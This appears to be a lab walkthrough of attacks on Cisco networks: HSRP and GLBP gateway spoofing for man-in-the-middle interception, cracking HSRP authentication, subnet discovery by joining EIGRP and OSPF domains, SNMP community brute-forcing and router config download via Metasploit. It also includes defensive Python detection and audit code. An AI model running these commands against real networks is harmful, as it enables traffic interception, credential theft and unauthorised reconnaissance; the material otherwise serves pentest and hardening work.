In my lab, the attacker is on the 172.16.0.0/24 network.
There are two HSRP speakers, at IP addresses 172.16.0.1 and 172.16.0.2; they serve the virtual HSRP address 172.16.0.254, which is the default gateway for legitimate clients.
The attacker's IP address is 172.16.0.3; it will attack the HSRP domain.
For spoofing, I'll be using the Loki tool. It is an old but very powerful tool for network attacks. It supports attacks against FHRP, HSRP among others, even with authentication support.
I will be using it in the course of my work.
Preparing and tuning the kernel
However, before the MITM, you need to prepare your host: enable routing and tune the kernel.
- A classic of the genre: switch your interface to promiscuous mode and enable routing. Enabling routing is a very important setting, because without it, during MITM, traffic from legitimate hosts will stop at your OS and go no further, which will cause a DoS. It is also best to disable ICMP Redirects: when MITM occurs, your machine may generate these messages, which will alarm IDS/IPS sensors.
caster@kali:~$ sudo ip link set dev eth0 promisc
caster@kali:~$ sudo sysctl -w net.ipv4.ip_forward=1
caster@kali:~$ sudo sysctl -w net.ipv4.conf.all.accept_redirects=0
caster@kali:~$ sudo sysctl -w net.ipv6.conf.all.accept_redirects=0
- FTP, H.323 and other traffic that does not work well with NAT can pass through you. The nf_conntrack module will help to pass traffic of such protocols.
caster@kali:~$ sudo modprobe nf_conntrack
- With MITM, your device must be prepared to handle a lot of traffic. You can tweak the Linux kernel a bit to optimally handle the large amount of traffic you will receive during network spoofing.
caster@kali:~$ sudo sysctl -w fs.file-max=100000
caster@kali:~$ sudo sysctl -w net.core.somaxconn=65535
caster@kali:~$ sudo sysctl -w net.core.netdev_max_backlog=65536
caster@kali:~$ sudo sysctl -w net.ipv4.tcp_fin_timeout=15
caster@kali:~$ sudo sysctl -w net.ipv4.tcp_tw_reuse=1
caster@kali:~$ sudo sysctl -w net.ipv4.tcp_tw_recycle=1
caster@kali:~$ sudo sysctl -w net.ipv4.tcp_max_tw_buckets=65536
- fs.file-max=100000: increases the maximum number of file descriptors that can be opened simultaneously. This is important because each network connection requires a file descriptor; increasing this value allows your laptop to handle more connections at the same time.
- net.core.somaxconn=65535: sets the maximum number of pending connections in the queue for sockets. In a MITM attack, especially FHRP spoofing, there may be many incoming connections waiting to be processed. This value increases the connection queue, which prevents connections from being dropped.
- net.core.netdev_max_backlog=65536: sets the maximum number of packets that can be queued on a network interface before being processed by the kernel. This allows your laptop to handle large amounts of incoming traffic more efficiently, which is critical for MITM attacks.
- net.ipv4.tcp_fin_timeout=15: reduces the waiting time before closing a connection after sending a FIN segment. This frees up resources for new connections faster, which is useful for the large number of short connections typical of MITM attacks.
- net.ipv4.tcp_tw_reuse=1: allows TIME-WAIT TCP connections to be reused for new connections. This helps to avoid port shortages when there are a large number of short-lived connections.
- net.ipv4.tcp_tw_recycle=1: enables fast recycling of TIME-WAIT TCP connections. This allows resources to be released faster for new connections, which can be useful under heavy traffic, although it carries security risks.
- net.ipv4.tcp_max_tw_buckets=65536: increases the maximum number of TIME-WAIT TCP connections that the system can handle simultaneously. This allows your laptop to handle more connections without dropping them prematurely.
- TCP Window Scaling controls the scaling of the TCP window. Increasing the TCP window can improve data transfer performance in a high latency or high load network. In TCP, each side sets the size of the window. The appropriate number of bytes can be sent without acknowledgment. Window Scaling provides the ability to increase this window size, which is especially useful when dealing with high-speed networks.
caster@kali:~$ sudo sysctl -w net.ipv4.tcp_window_scaling=1
Spoofing
You need to launch Loki and select the network interface to attack. In my case, it is eth0.
If we analyze the HSRP traffic in more detail, we can see that the Active router priority is 150, which is less than 255. The group number is 1 and there is no authentication.
Then you need to start spoofing by clicking on Get IP and also check the Gratuitous ARP box.
Gratuitous ARP is a special type of ARP frame that notifies the entire link segment that a new MAC-to-IP address mapping has appeared.
You must then assign the HSRP virtual address to your interface as a secondary. Since we start serving this address after the attack, it is very important to put it on our interface.
caster@kali:~$ sudo ifconfig eth0:1 172.16.0.254 netmask 255.255.255.0
You will then need to configure a new default route and delete the old one. The new route must go through the former Active router. If this is not done, the legitimate hosts' traffic will terminate on the attacker's computer, which will inevitably lead to DoS.
caster@kali:~$ sudo route del default
caster@kali:~$ sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 172.16.0.1
You can also enable NAT, to capture not only incoming traffic, but also outgoing traffic.
caster@kali:~$ sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
However, this NAT rule may cause side effects. For example, a customer's infrastructure may have Zabbix agents, and this rule could lead to the Zabbix server no longer being able to reach them, because the attacker's host would be masquerading the addresses of legitimate hosts.
This concludes the attack on HSRP; it's time to analyze the traffic for sensitive data:
Verification of a captured lyrica account:
Authentication Cracking
Authentication in the HSRP domain can make life difficult for an attacker, but the mere presence of authentication does not mean anything; an attacker may well be able to brute-force the authentication password.
This is accomplished by listening to and recording traffic, then extracting the hashes with hsrp2john.py, and then brute-forcing them with John.
caster@kali:~/lyrica$ python2 hsrp2john.py hsrptraffic.pcap
This is how you can perform an authentication attack on an HSRP domain. The password is myownsummershoveit.
GLBP Attacks
GLBP (Gateway Load Balancing Protocol) is a protocol developed by Cisco to provide load balancing and fault tolerance in networks. It allows multiple routers to share a single virtual IP address and dynamically distribute load among them.
Another protocol from the FHRP class, also made by Cisco engineers. It differs from HSRP in that it offers load balancing in addition to redundancy.
GLBP Theory
GLBP works by creating a group of routers, one of which is designated as the active virtual gateway (AVG) and the others as active virtual forwarders (AVFs). The AVG is responsible for load balancing among the AVFs by assigning to each request the virtual MAC address of one of the AVFs.
GLBP terminology is as follows:
- AVG (Active Virtual Gateway) — the device that is essentially the father of the entire GLBP logical domain. The AVG tells the other routers how to handle legitimate traffic, hands out MAC addresses and is responsible for answering ARP requests. Note that there can be only one AVG within a single GLBP group.
- AVF (Active Virtual Forwarder) — a device in the GLBP domain that forwards traffic. There can be several of them.
- GLBP Group — a logical GLBP group that includes physical routers. Each GLBP logical group has its own unique numeric identifier.
- GLBP MAC — the virtual MAC address of the AVF members, distributed by the current AVG router.
- GLBP Virtual IP Address — the IP address the AVG router is responsible for.
- GLBP Preempt Mode — an option that allows a recovered AVG device to regain its role after being replaced by an AVF, based on its priority value. By default, preempt mode is disabled for the AVG role, while it is enabled for AVF members (with a delay of up to 30 seconds, but this value can be configured manually).
- GLBP Weight — a metric indicating the degree of load on the device interface. The greater this metric is, the higher the load on the router interface.
GLBP Spoofing Theory
It's actually the same as with HSRP: send a packet with the highest priority and weight values. This is also done with Loki.
GLBP Lab Network
In my lab, the attacker is on the 172.16.0.0/24 network.
There are two GLBP speakers here: 172.16.0.1 is the AVG router, while 172.16.0.2 is an AVF router. They serve the virtual address 172.16.0.254.
The attacker's address is 172.16.0.3.
GLBP Spoofing
The preparation is the same as covered in the HSRP chapter; keep this in mind.
Likewise, start Loki and choose your network interface.
This is what a GLBP packet from an AVG router looks like. Priority is 130, GLBP group number is 1.
Now you need to do the spoofing: again click Get IP and select Gratuitous ARP.
Loki will generate a special GLBP packet with a priority of 255 and a weight value of 255. The higher the GLBP weight, the higher the load on the interface.
Then set the GLBP virtual address as a secondary address on your interface:
caster@kali:~$ sudo ifconfig eth0:1 172.16.0.254 netmask 255.255.255.0
Then set up a new default route through the former AVG router, deleting the old one before doing so. Again, if you don't do this, the legitimate hosts' traffic will be dropped at your device, which leads to a DoS.
caster@kali:~$ sudo route del default
caster@kali:~$ sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 172.16.0.1
This completes the attack on GLBP; you can now listen to the traffic for sensitive data:
Verify this account from FTP:
This is how GLBP is attacked. The attack carries a lot of risk, so it is not always used, even when the GLBP configuration is vulnerable to it.
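As an added defensive example (my own code, not part of the original article and not Loki's), here is a parser for GLBP packets and a check that flags what the takeover described above looks like on the wire: a speaker that is not one of the known routers, an AVG priority of 255, or a forwarder weight of 255. The field layout follows Wireshark's GLBP dissector and the two sample packets are constructed; both are assumptions, not captures from the lab.

```python
import struct

# GLBP field layout (UDP/3222 to 224.0.0.102) as decoded by Wireshark's GLBP dissector;
# an assumption here, since the article only shows Loki's screenshots.
HDR = struct.Struct("!BBHH6s")            # version, pad, group, pad, owner MAC
HELLO = struct.Struct("!BBBBHIIHHHBB4s")  # pad, vg_state, pad, priority, pad, hello ms, hold ms, redirect, timeout, pad, addr type, addr len, VIP
FWD = struct.Struct("!BBBBB7s6s")          # forwarder, vf_state, pad, priority, weight, pad, virtual MAC
def parse_glbp(payload: bytes) -> dict:
    """Decode one GLBP packet into its group, owner MAC, hello TLV and forwarder TLVs."""
    _, _, group, _, owner = HDR.unpack_from(payload)
    pkt = {"group": group, "owner": owner.hex(":"), "hello": None, "forwarders": []}
    off = HDR.size
    while off + 2 <= len(payload):
        ttype, tlen = payload[off], payload[off + 1]   # TLV length counts the 2-byte TLV header
        if tlen < 2 or off + tlen > len(payload):
            raise ValueError("malformed GLBP TLV")
        body = payload[off + 2:off + tlen]
        if ttype == 1 and len(body) >= HELLO.size:
            f = HELLO.unpack_from(body)
            pkt["hello"] = {"priority": f[3], "hello_ms": f[5], "hold_ms": f[6],
                            "vip": ".".join(str(b) for b in f[12])}
        elif ttype == 2 and len(body) >= FWD.size:
            f = FWD.unpack_from(body)
            pkt["forwarders"].append({"forwarder": f[0], "priority": f[3], "weight": f[4], "vmac": f[6].hex(":")})
        off += tlen
    return pkt
def check_glbp(pkt: dict, src_ip: str, expected_speakers: set) -> list:
    """Flag what the takeover looks like on the wire: an unknown source, priority 255 or weight 255."""
    alerts = []
    tag = f"GLBP group {pkt['group']} from {src_ip}"
    if src_ip not in expected_speakers:
        alerts.append(f"{tag}: unexpected speaker")
    if pkt["hello"] and pkt["hello"]["priority"] == 255:
        alerts.append(f"{tag}: AVG priority 255 (claim on the virtual gateway role)")
    for fw in pkt["forwarders"]:
        if fw["priority"] == 255 or fw["weight"] == 255:
            alerts.append(f"{tag}: forwarder {fw['forwarder']} advertises priority {fw['priority']}, weight {fw['weight']}")
    return alerts

# Two constructed packets (not captures from the lab): the AVG's normal hello for group 1,
# VIP 172.16.0.254, priority 130, and the same packet carrying priority 255 / weight 255.
AVG_HELLO = bytes.fromhex(
    "01000001 0000 0c1234560001"                                              # group 1, owner MAC
    "011c 00 20 00 82 0000 00000bb8 00002710 0258 3840 0000 01 04 ac1000fe"  # hello TLV, priority 130
    "0214 01 20 00 82 64 00000000000000 0007b4000101")                       # forwarder TLV, weight 100
ROGUE_HELLO = bytes.fromhex(
    "01000001 0000 deadbeef0003"
    "011c 00 20 00 ff 0000 00000bb8 00002710 0258 3840 0000 01 04 ac1000fe"  # priority 255
    "0214 01 20 00 ff ff 00000000000000 0007b4000101")                       # priority 255, weight 255
```

Fed with the UDP payloads captured on 224.0.0.102 and the list of legitimate GLBP routers, the check reports the rogue hello while the AVG's own hello stays silent.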
Searching for subnets with EIGRP
EIGRP (Enhanced Interior Gateway Routing Protocol) is a dynamic routing protocol developed by Cisco for use in enterprise networks. It is efficient and scalable, but can be vulnerable to attack if not properly configured.
In fact, there are plenty of attacks on dynamic routing, but they have very little impact. Perhaps the most practical attack is subnet discovery.
The attacker joins the routing domain, and since routing information is exchanged automatically when the adjacency is established, the attacker learns about the subnets without resorting to scanning. This is a useful time-saving trick.
Within my lab network there is an EIGRP speaker at the address 192.168.1.89. The AS number is 100.
FRRouting
With FRR, an attacker can connect to the EIGRP routing domain. But it requires a little bit of configuration.
caster@kali:~$ sudo apt install frr
After installing FRRouting, you must make an adjustment to the daemons configuration file and specify eigrpd=yes:
caster@kali:~$ sudo nano /etc/frr/daemons
caster@kali:~$ sudo systemctl restart frr
Now you need to log in to the FRR control panel:
caster@kali:~$ sudo vtysh
Now you need to start the EIGRP process with an AS number of 100, and declare your address with a /32 mask to establish the adjacency.
kali# config t
kali(config)# router eigrp 100
kali(config-router)# network 192.168.1.103/32
The screenshot above shows the EIGRP traffic at the moment the adjacency was set up. To see a list of your EIGRP neighbors:
kali# show ip eigrp neighbors
After the adjacency between the attacker and the EIGRP speaker was established, two new subnets, 10.134.25.0/24 and 10.178.121.0/24, appeared in the attacker's routing table.
This is how subnet information is collected by, shall we say, abusing dynamic routing protocols.
Searching for subnets with OSPF
OSPF (Open Shortest Path First), an intradomain dynamic routing protocol, is used in almost every major corporate network.
In the context of an attack it is useful for the same purpose: subnet discovery. It is the same trick as with EIGRP.
However, you have to realize that OSPF and EIGRP are completely different protocols, each with its own philosophy.
You must enable the ospfd daemon to run the OSPF process on the attacker's computer:
You then need to join the OSPF domain; this is done by declaring your address. In my case it is 192.168.1.103/32, and the area is 0.0.0.0.
kali# conf t
kali(config)# router ospf
kali(config-router)# network 192.168.1.103/32 area 0.0.0.0
kali(config-router)#
This is the traffic at the moment of neighbor establishment: the OSPF service message exchange (DB Description, LSU, LSR, LSAck).
The OSPF adjacency is established; my neighbor is 192.168.1.89:
kali# show ip ospf ne
Neighbor ID Pri State Up Time Dead Time Address Interface RXmtL RqstL DBsmL
10.134.25.11 1 Full/DR 2m07s 35.482s 192.168.1.89 eth0:192.168.1.103 0 0 0
kali#
If we look at the routing table, we see new routes!
kali# show ip route
Codes: K - kernel route, C - connected, L - local, S - static,
R - RIP, O - OSPF, I - IS-IS, B - BGP, E - EIGRP, N - NHRP,
T - Table, v - VNC, V - VNC-Direct, A - Babel, F - PBR,
f - OpenFabric, t - Table-Direct,
> - selected route, * - FIB route, q - queued, r - rejected, b - backup
t - trapped, o - offload failure
K>* 0.0.0.0/0 [0/100] via 192.168.1.1, eth0, src 192.168.1.103, 00:08:36
O 10.134.25.0/24 [110/101] via 192.168.1.89, eth0 inactive, weight 1, 00:02:19
O 10.178.121.0/24 [110/101] via 192.168.1.89, eth0 inactive, weight 1, 00:02:19
O>* 192.168.1.0/24 [110/100] is directly connected, eth0, weight 1, 00:02:22
L>* 192.168.1.103/32 is directly connected, eth0, 00:08:36
They are 10.134.25.0/24 and 10.178.121.0/24.
The attacker learned about them without any scanning. This is the benefit of the trick: a simple FRR setup, an adjacency, and information about the existing networks is gathered. It's as simple as that.
Router Configuration Upload
If an attacker finds an SNMP RW community string for a Cisco router, they will be able to download the router's configuration in plaintext. You can use the Metasploit module cisco_config_tftp to do this. By obtaining such a configuration file, an attacker can learn about infrastructure features, collect hashes, attempt to brute-force them, and so on.
It is actually a fairly simple attack vector: first find the RW string, then run the MSF module.
The SNMP RW string can be brute-forced using onesixtyone:
caster@kali:~$ onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt 192.168.1.89
Scanning 1 hosts, 3219 communities
192.168.1.89 [public] Cisco IOS Software [Amsterdam], Virtual XE Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 17.3.2, RELEASE SOFTWARE (fc3) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2020 by Cisco Systems, Inc. Compiled Sat 31-Oct-20 13:1
192.168.1.89 [public] Cisco IOS Software [Amsterdam], Virtual XE Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 17.3.2, RELEASE SOFTWARE (fc3) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2020 by Cisco Systems, Inc. Compiled Sat 31-Oct-20 13:1
192.168.1.89 [cisco] Cisco IOS Software [Amsterdam], Virtual XE Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 17.3.2, RELEASE SOFTWARE (fc3) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2020 by Cisco Systems, Inc. Compiled Sat 31-Oct-20 13:1
In my case, it is the string cisco that has RW permissions, and it is used for this attack.
Now you need to run MSF and the cisco_config_tftp module:
caster@kali:~$ msfconsole
msf6 > use auxiliary/scanner/snmp/cisco_config_tftp
msf6 auxiliary(scanner/snmp/cisco_config_tftp) > show options
Module options (auxiliary/scanner/snmp/cisco_config_tftp):
Name Current Setting Required Description
---- --------------- -------- -----------
COMMUNITY public yes SNMP Community String
LHOST no The IP address of the system running this module
OUTPUTDIR no The directory where we should save the configuration files (disabled by default)
RETRIES 1 yes SNMP Retries
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 161 yes The target port (UDP)
SOURCE 4 yes Grab the startup (3) or running (4) configuration (Accepted: 3, 4)
THREADS 1 yes The number of concurrent threads (max one per host)
TIMEOUT 1 yes SNMP Timeout
VERSION 1 yes SNMP Version <1/2c>
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/snmp/cisco_config_tftp) >
After specifying the community string, the target address, and the directory where the Cisco configuration file will be saved, the module downloads the configuration file:
msf6 auxiliary(scanner/snmp/cisco_config_tftp) > set COMMUNITY cisco
COMMUNITY => cisco
msf6 auxiliary(scanner/snmp/cisco_config_tftp) > set RHOSTS 192.168.1.89
RHOSTS => 192.168.1.89
msf6 auxiliary(scanner/snmp/cisco_config_tftp) > set OUTPUTDIR /home/caster/
OUTPUTDIR => /home/caster/
msf6 auxiliary(scanner/snmp/cisco_config_tftp) > run
[*] Starting TFTP server...
[*] Scanning for vulnerable targets...
[*] Trying to acquire configuration from 192.168.1.89...
[*] Scanned 1 of 1 hosts (100% complete)
[*] Providing some time for transfers to complete...
[*] Incoming file from 192.168.1.89 - 192.168.1.89.txt 6210 bytes
[*] Saved configuration file to /home/caster/192.168.1.89.txt
[*] Shutting down the TFTP service...
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/snmp/cisco_config_tftp) >
Thus, once an RW string is found, you can read Cisco router configuration files without authentication. It is highly recommended to use more complex community strings and to filter access to the SNMP port with ACLs.
Config Analyzing
CCAT is a tool that automates the search for network security issues in a Cisco IOS configuration file. It is quite a powerful solution, as it analyzes in detail every part of the configuration: routing, switch ports, DP, etc.
caster@kali:~/ccat$ python3 ccat.py ~/192.168.1.89.txt
This tool makes life easier for network engineers and system administrators. CCAT also allows you to improve the quality of device hardening.
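As an added example (my own code, not CCAT's and not from the article), here is a small audit of an IOS running-config such as the one pulled over SNMP above, covering the weaknesses the EIGRP, OSPF, GLBP and SNMP sections relied on: an RW community without an ACL, a GLBP group without authentication, and routing processes that form adjacencies with anyone because they lack passive-interface default and neighbor authentication. The sample config is constructed, and the authentication checks are heuristics for classic-mode EIGRP and interface- or area-level OSPF authentication.

```python
# Constructed sample running-config, modelled on the article's lab (not the file the
# Metasploit module uploaded): RW community without ACL, unauthenticated GLBP, open routing.
SAMPLE_CONFIG = """\
snmp-server community cisco RW
snmp-server community monitor RO 10
interface GigabitEthernet1
 ip address 172.16.0.1 255.255.255.0
 glbp 1 ip 172.16.0.254
 glbp 1 priority 130
router eigrp 100
 network 192.168.1.0 0.0.0.255
router ospf 1
 network 192.168.1.0 0.0.0.255 area 0
"""

def blocks(config):
    """Split IOS config text into (header, [indented sub-lines]) pairs; '!' separators are dropped."""
    out = []
    for line in config.splitlines():
        if line.startswith(" ") and out:
            out[-1][1].append(line.strip())
        elif line.strip() and line.strip() != "!":
            out.append((line.strip(), []))
    return out

def audit(config):
    """Return findings for the weaknesses this article exploits; a hardened config yields []."""
    cfg = blocks(config)
    iface_lines = [l for h, b in cfg if h.startswith("interface ") for l in b]
    findings = []
    for header, body in cfg:
        parts = header.split()
        # 'snmp-server community NAME RW [acl]': exactly four tokens means no ACL restricts it
        if header.startswith("snmp-server community") and "RW" in parts and len(parts) == 4:
            findings.append(f"SNMP RW community {parts[2]!r} reachable without an ACL")
        elif header.startswith("interface "):
            glbp = [l for l in body if l.startswith("glbp ")]
            if glbp and not any("authentication" in l for l in glbp):
                findings.append(f"{header}: GLBP group without authentication (AVG role can be spoofed)")
        elif header.startswith(("router eigrp ", "router ospf")):
            if "passive-interface default" not in body:
                findings.append(f"{header}: no 'passive-interface default', adjacencies accepted on every interface")
            if parts[1] == "eigrp" and not any(l.startswith(f"ip authentication mode eigrp {parts[2]}") for l in iface_lines):
                findings.append(f"{header}: no interface has 'ip authentication mode eigrp {parts[2]}'")
            if parts[1] == "ospf" and not any(l.startswith("ip ospf authentication") for l in iface_lines) \
                    and not any(l.startswith("area ") and "authentication" in l for l in body):
                findings.append(f"{header}: OSPF neighbors are not authenticated")
    return findings
```

Running audit() over the sample reports six findings; once the community gets an ACL, the GLBP group gets an MD5 key, and both routing processes get passive-interface default plus authentication, the list is empty.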
Outro
In this article I have demonstrated attacks on Cisco IOS; I expect it will help both pentesters and network security professionals.